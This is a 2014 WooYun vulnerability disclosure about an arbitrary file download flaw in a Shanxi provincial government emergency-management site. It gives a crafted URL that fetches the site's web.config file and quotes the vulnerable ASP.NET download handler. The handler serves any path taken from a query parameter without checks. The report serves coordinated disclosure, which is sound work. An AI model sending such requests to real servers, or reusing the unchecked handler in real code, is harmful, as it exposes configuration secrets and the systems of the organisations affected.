当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079300

漏洞标题:山西省安全生产应急管理平台任意文件下载

相关厂商:cncert国家互联网应急中心

漏洞作者: sco4x0

提交时间:2014-10-14 12:24

修复时间:2014-11-28 12:26

公开时间:2014-11-28 12:26

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-14: 细节已通知厂商并且等待厂商处理中
2014-10-17: 厂商已经确认,细节仅向厂商公开
2014-10-27: 细节向核心白帽子及相关领域专家公开
2014-11-06: 细节向普通白帽子公开
2014-11-16: 细节向实习白帽子公开
2014-11-28: 细节向公众公开

简要描述:

xx

详细说明:

普通下载连接
http://glpt.sxaj.gov.cn/Design/pages/YingMa/news/downfile.aspx?FilePath=~/upload/20120427/129799872737343750.doc
重新构造成
http://glpt.sxaj.gov.cn/Design/pages/YingMa/news/downfile.aspx?FilePath=~/web.config

Unnamed QQ Screenshot20141014105214.png


直接下载downfile.aspx.cs处理代码查看

protected void Page_Load(object sender, EventArgs e)
{
FileDownload(FilePath);
}
public string FilePath
{
get
{
string temp =Server.UrlDecode( QcdContext.QueryString["FilePath"]);
if (temp != "")
{
return temp;
}
else
{
Response.Write("文件不存在");
Response.End();
return "";
}
}
}
public static void FileDownload(string FileName)
{
String FullFileName = System.Web.HttpContext.Current.Server.MapPath(FileName);
FileInfo DownloadFile = new FileInfo(FullFileName);
System.Web.HttpContext.Current.Response.Clear();
System.Web.HttpContext.Current.Response.ClearHeaders();
System.Web.HttpContext.Current.Response.Buffer = false;
System.Web.HttpContext.Current.Response.ContentType = "application/octet-stream";
System.Web.HttpContext.Current.Response.AppendHeader("Content-Disposition", "attachment;filename=" + System.Web.HttpUtility.UrlEncode(DownloadFile.FullName, System.Text.Encoding.UTF8));
System.Web.HttpContext.Current.Response.AppendHeader("Content-Length", DownloadFile.Length.ToString());
System.Web.HttpContext.Current.Response.WriteFile(DownloadFile.FullName);
System.Web.HttpContext.Current.Response.Flush();
System.Web.HttpContext.Current.Response.End();
}

漏洞证明:

Unnamed QQ Screenshot20141014105214.png

修复方案:

xx

版权声明:转载请注明来源 sco4x0@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-10-17 15:41

厂商回复:

最新状态:

暂无